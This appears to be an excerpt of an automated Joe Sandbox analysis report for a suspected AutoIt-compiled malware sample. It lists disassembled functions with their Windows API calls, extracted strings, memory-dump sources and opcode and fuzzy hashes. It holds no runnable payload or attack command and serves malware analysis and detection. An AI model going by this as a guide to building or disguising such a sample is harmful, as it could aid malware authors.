String ID: static
API String ID: 2139405536-2160076837
Opcode ID: be9d15106283f32d73a01d056dae10d86d67e41d4a5f4d5423549244c6423b7e
Instruction ID: d9788c9899c7522218275ab4addd7f73f4a76ae600fffe49f6da806261780b35
Opcode Fuzzy Hash: be9d15106283f32d73a01d056dae10d86d67e41d4a5f4d5423549244c6423b7e
Instruction Fuzzy Hash: 4B318F71510604AADB109F35CC80BFB73ADFF59764F10861EF9A9C7190EA74AC81C769

Function 00445157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004451C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00445201

Strings

0, xrefs: 004451BF

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 183a3dfb3021612d41347649a7ba661f2d13a72c163a7152af6843b21bb45d53
Instruction ID: 5b10929a3873ab4178e6ce3d4b5ff2fbe3bc7aec09b2f3309b6731db4349dc23
Opcode Fuzzy Hash: 183a3dfb3021612d41347649a7ba661f2d13a72c163a7152af6843b21bb45d53
Instruction Fuzzy Hash: 9631E531A00208ABFF24CF99D845B9FBBF4BF45350F14405FE981A62A2D7B89944CF19

Function 0045658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00456608

Strings

AUTOITCALLVARIABLE%d, xrefs: 004565FA
, $, xrefs: 00456648

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: 3d7ec60bf93e671b435c0431409a465a58b652291a3d84ae4b3dd8b12e11eab2
Instruction ID: fee805f44d74d647617933fdb8fb0fcedd988ae0d96ca396d508efdd7dfb75b5
Opcode Fuzzy Hash: 3d7ec60bf93e671b435c0431409a465a58b652291a3d84ae4b3dd8b12e11eab2
Instruction Fuzzy Hash: 11218671A00114ABCF14EF55C881FEE77B4AF45305F51046FF805AB182DB78E949CBA9

Function 004693CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0046945C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00469467

Strings

Combobox, xrefs: 00469429

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: a2ee0d10134b556b24ff81701b058da409ae0cf6f9f97c1d448d392aa4014ca9
Instruction ID: 0958ac638f35600e6680e70f277b7a25b188f367ae3316ed6a952ac5d0afe81a
Opcode Fuzzy Hash: a2ee0d10134b556b24ff81701b058da409ae0cf6f9f97c1d448d392aa4014ca9
Instruction Fuzzy Hash: AC11B6713042087FEF119F54DC80EBB376EEB483A4F10012AF91497390E6799C528769

Function 0046DA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

GetActiveWindow.USER32 ref: 0046DA7B
EnumChildWindows.USER32(?,0046D75F,00000000), ref: 0046DAF5

Strings

T1E, xrefs: 0046DAFB

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: T1E
API String ID: 3814560230-1411378643
Opcode ID: dc6795ed03029fcc1276c237ff838b1bdfa8bc71b832531143d7701350fa4869
Instruction ID: b376bbb36164a2b249426f57df503e6500b549dd451f859ab6e5aac0eec2682c
Opcode Fuzzy Hash: dc6795ed03029fcc1276c237ff838b1bdfa8bc71b832531143d7701350fa4869
Instruction Fuzzy Hash: E5213B79B04201DFC754DF68D850AA673E5EB5A320F25062EF86A873E1E734A850CB69

Function 004698FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0041D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0041D1BA
Part of subcall function 0041D17C: GetStockObject.GDI32(00000011), ref: 0041D1CE
Part of subcall function 0041D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0041D1D8

GetWindowRect.USER32(00000000,?), ref: 00469968
GetSysColor.USER32(00000012), ref: 00469982

Strings

static, xrefs: 00469945

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: dc8e27ef5aeff02486cdc16f77dbb5bc8abffe54765a41134c13d0c8190d2f45
Instruction ID: 298e3bd79bdac7eea84c9a0c33d59882faeeb666d7678b2b6b60e360f338a6ae
Opcode Fuzzy Hash: dc8e27ef5aeff02486cdc16f77dbb5bc8abffe54765a41134c13d0c8190d2f45
Instruction Fuzzy Hash: F51159B2510209AFDB04DFB8CC45AFA7BA8FB08304F040A2DF955E2250E778E851DB64

Function 00469617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00469699
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004696A8

Strings

edit, xrefs: 0046967D

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: c86d9eb9ffc1d426f222cee146d04e483dea2355f225b7c887d0f75077ba98af
Instruction ID: 079201cb152505e4b2648a84ffa414ebecf0272cf0d9648ea889d6aacb27be9d
Opcode Fuzzy Hash: c86d9eb9ffc1d426f222cee146d04e483dea2355f225b7c887d0f75077ba98af
Instruction Fuzzy Hash: 7F118CB1500208ABEF105F64DC40EEB3B6EEB05378F50472AF965932E0E7B9DC51976A

Function 00445262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004452D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 004452F4

Strings

0, xrefs: 004452CE

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 5f1f7562660535dd0787f45482b6577770730e5d2864a594714d20415fe06af5
Instruction ID: 4aa882214851b6137429ad84dca8c1b776e6d3ce1b64bb11d89768716e185c9b
Opcode Fuzzy Hash: 5f1f7562660535dd0787f45482b6577770730e5d2864a594714d20415fe06af5
Instruction Fuzzy Hash: 7F11E675901614ABEF10DF98DD04F9E77B8AB06B50F040067ED01E72A6D3B4ED04CBA9

Function 00454D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00454DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00454E1E

Strings

<local>, xrefs: 00454DE6

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: c41af664caa84992bae27b1839a8a9f44ed4492246e170a5140c86a16522e1f5
Instruction ID: a2b902033b2b272dcdd8de091da7bffdf87fca83f2330df1588581490dfa76f8
Opcode Fuzzy Hash: c41af664caa84992bae27b1839a8a9f44ed4492246e170a5140c86a16522e1f5
Instruction Fuzzy Hash: E511CE70501221BADB248F51CC89EFBFBA8FB4635AF10822BF9054A241D3785989D6F4

Function 0042A70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004337A7
___raise_securityfailure.LIBCMT ref: 0043388E

Strings

(L, xrefs: 00433889

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (L
API String ID: 3761405300-64732604
Opcode ID: a40f8e116bfc696f368d88831b551c28d1c3d89a3c6c6fa4c88d08e655525652
Instruction ID: 96f49d47f233934f97ff6fc98e2702f1e7ee9d77956f56a4b685f7c9de796b82
Opcode Fuzzy Hash: a40f8e116bfc696f368d88831b551c28d1c3d89a3c6c6fa4c88d08e655525652
Instruction Fuzzy Hash: 6821F0B5580304DBE780DF59F985E513BB5BB48314F10983AE9098B3A1E3F4A990CF4D

Function 0045A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0045A84E
htons.WSOCK32(00000000,?,00000000), ref: 0045A88B

Strings

255.255.255.255, xrefs: 0045A866

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: 247d1f042c941e4ceba1292f70c7cc75ae078602170ffbaf1e7425dee2c373b8
Instruction ID: 33c0523eded20f95c2541e34a1306b90952281821fa3487106dbad58873c6196
Opcode Fuzzy Hash: 247d1f042c941e4ceba1292f70c7cc75ae078602170ffbaf1e7425dee2c373b8
Instruction Fuzzy Hash: F7012674600304ABCB10EF68D886FADB364EF04315F10866BF912A73D2D739E819875A

Function 0043B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0043B7EF

Strings

ComboBox, xrefs: 0043B78B
ListBox, xrefs: 0043B7B9

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 24ba98f40b48ac42636505f46d85276ec0c8781495c614b1d77dab7513cfc060
Instruction ID: faa06fab09b860605fa71cac64a851d916af7b13232032877203d1f3c0118a4b
Opcode Fuzzy Hash: 24ba98f40b48ac42636505f46d85276ec0c8781495c614b1d77dab7513cfc060
Instruction Fuzzy Hash: 9601F571A00114EBCB04EBA4DC52AFE7369EF49354B10072EF461632D2EB78590887E8

Function 0043B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 0043B6EB

Strings

ComboBox, xrefs: 0043B687
ListBox, xrefs: 0043B6B5

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: ca03a840547f1c015c86af6f08eb8a1e6fc3178739941f7e2508374bc1ffdbfa
Instruction ID: b8f5d47413315d950295729a5b1110aeefbe7e91dcf1101fa693de6a23fb402e
Opcode Fuzzy Hash: ca03a840547f1c015c86af6f08eb8a1e6fc3178739941f7e2508374bc1ffdbfa
Instruction Fuzzy Hash: F3014471A41104ABCB05EBA5D953BFF73A89F09344F10112EB502732D2DB685E1897FE

Function 0043B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 0043B76C

Strings

ComboBox, xrefs: 0043B70A
ListBox, xrefs: 0043B738

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 591c62a720fef4d19e6080732ce5aee36145cf349c47a4d09087dc556d413ce1
Instruction ID: c3be138fd8a8966307237f1d2d4df2bf089ee9f861b5d3441c339aeace00059b
Opcode Fuzzy Hash: 591c62a720fef4d19e6080732ce5aee36145cf349c47a4d09087dc556d413ce1
Instruction Fuzzy Hash: 2D018FB1A41104EACB00E7A4DA52BFE73A8DB49348F10012FB901B32D2DB685E0987FD

Function 00424D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00424D9E
__calloc_crt.LIBCMT ref: 00424DB7

Strings

"L, xrefs: 00424DCE

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: __calloc_crt
String ID: "L
API String ID: 3494438863-1021959943
Opcode ID: 66f747faf28bdfd779318f00ea52284b472075d50e4290715465b296602a3bb6
Instruction ID: eceeb894ac627c810ad756cc3828aaa3408dd9ea78c7f78f9365c7f2dbc213ef
Opcode Fuzzy Hash: 66f747faf28bdfd779318f00ea52284b472075d50e4290715465b296602a3bb6
Instruction Fuzzy Hash: D1F028713183219AF3149F59BD40EA667D4E740724F50406FF201CA294EBF8C8818A9C

Function 00404024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

LoadImageW.USER32(00400000,00000063,00000001,00000010,00000010,00000000), ref: 00404048
EnumResourceNamesW.KERNEL32(00000000,0000000E,004467E9,00000063,00000000,75C10280,?,?,00403EE1,?,?,000000FF), ref: 004741B3

Strings

>@, xrefs: 00404028

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: EnumImageLoadNamesResource
String ID: >@
API String ID: 1578290342-3542666865
Opcode ID: bab34c3f728c8b386ba82047d6e39d7d497ddc0bf13f65d9d22f117b650463ae
Instruction ID: e4973a436c4eec6c210a25eda4c59efc3669ea1aa6e7713dab2b8f7e5e7bc754
Opcode Fuzzy Hash: bab34c3f728c8b386ba82047d6e39d7d497ddc0bf13f65d9d22f117b650463ae
Instruction Fuzzy Hash: DDF0627164031077E2205B16EC4AFD63B59E746BB5F104526F314A61E1D3F49080879C

Function 00447744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00447762
_wcscmp.LIBCMT ref: 00447774

Strings

#32770, xrefs: 0044776E

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 19885046d328be14b13736f514f01db7c9f633ee2f0e495d3f61fe0272f84085
Instruction ID: 5da36549c17edabc345c5b580b635295ffd76962587edd0bfd7ecaf78b42af47
Opcode Fuzzy Hash: 19885046d328be14b13736f514f01db7c9f633ee2f0e495d3f61fe0272f84085
Instruction Fuzzy Hash: C8E09B7760422427D7109B96AC45EC7FB6CAB51764F01006BB905D3191E674A64187D8

Function 0043A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0043A63F

Part of subcall function 004213F1: _doexit.LIBCMT ref: 004213FB

Strings

Error allocating memory., xrefs: 0043A638
AutoIt, xrefs: 0043A633

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: e245a1cd8275b0e963c3e698ad5fa9ef0fae7de9ffd2a558bfdf3f366fb760a5
Instruction ID: 5d97c885ed2fb4aad5e724718862caed6ad4245b0840fc8da154a937ba3d52f3
Opcode Fuzzy Hash: e245a1cd8275b0e963c3e698ad5fa9ef0fae7de9ffd2a558bfdf3f366fb760a5
Instruction Fuzzy Hash: 53D02B313C032833D21436993C17FCA36488B14B55F14043BBF0CA51E249EED58002ED

Function 0047AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 0047ACC0
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0047AEBD

Strings

WIN_XPe, xrefs: 0047ACD3

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: f02dee9907a3410a0ad3bfb725c55c2b44904c0d5ea618dd59c9d693f90e6aae
Instruction ID: f0b89022b82c59c2a06aa5e0fa401b0a8aeab976c9a9b17577a1c73a37eb26dc
Opcode Fuzzy Hash: f02dee9907a3410a0ad3bfb725c55c2b44904c0d5ea618dd59c9d693f90e6aae
Instruction Fuzzy Hash: BFE06DB0C00209EFCB16DBA5D9449ECB7B8AB88301F14C097E006B2260CB745A89DF2B

Function 004686CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004686E2
PostMessageW.USER32(00000000), ref: 004686E9

Part of subcall function 00447A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00447AD0

Strings

Shell_TrayWnd, xrefs: 004686DB

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
